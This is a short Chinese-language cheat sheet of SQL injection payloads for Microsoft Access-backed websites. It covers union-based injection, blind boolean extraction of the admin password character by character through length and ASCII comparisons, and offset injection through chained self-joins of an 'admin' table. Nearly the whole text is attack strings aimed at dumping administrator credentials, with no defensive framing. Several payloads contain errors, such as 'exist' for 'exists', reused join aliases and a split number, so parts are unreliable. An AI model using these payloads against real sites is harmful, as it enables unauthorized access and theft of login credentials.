一、access注入
access只有一个数据库
A联合注入
1、order by 20 确定字段数 猜表名
2、union select 1,2,3,4,5,6 from admin 爆数字
3、union select password,2,3,4,5,6 from admin 猜列名
B逐字注入
1、 and exist(select * from admin) 猜表
有admin表返回正常
2、 and exist(select password from admin) 猜列
有password列返回正常
3、 and (select top 1 len(password) from admin)=5 确定长度
and (select top 1 len(password) from admin)>5
等于5或大于5返回正常
4、 and (select top 1 asc(mid(password,2,1)) from admin)=97
确定具体数 97是ASCII码
对则返回正常
二、access获取列名失败
采用偏移注入、社工、查看源码中参数名
1、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,2 0,21,22 from admin
2、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,20,21 * from admin
3、union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,14,15,16,17,18,19,20 * from admin
减到多少返回正常时,则执行 倍数 减 假设为4
union select 1,2,3,4,5,6,7,8,9,1,0,11,12,13,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,a.id,b.id,c.id* from (admin as a inner join admin as b on a.id=b.id)
5、 union select 1,2,3,4,5, * from ((admin as a inner join admin as b on a.id=b.id) inner join admin as b on a.id=c.id)
6、 union select 1, * from (((admin as a inner join admin as b on a.id=b.id) inner join admin as b on a.id=c.id) inner join admin as b on a.id=d.id)
爆出数据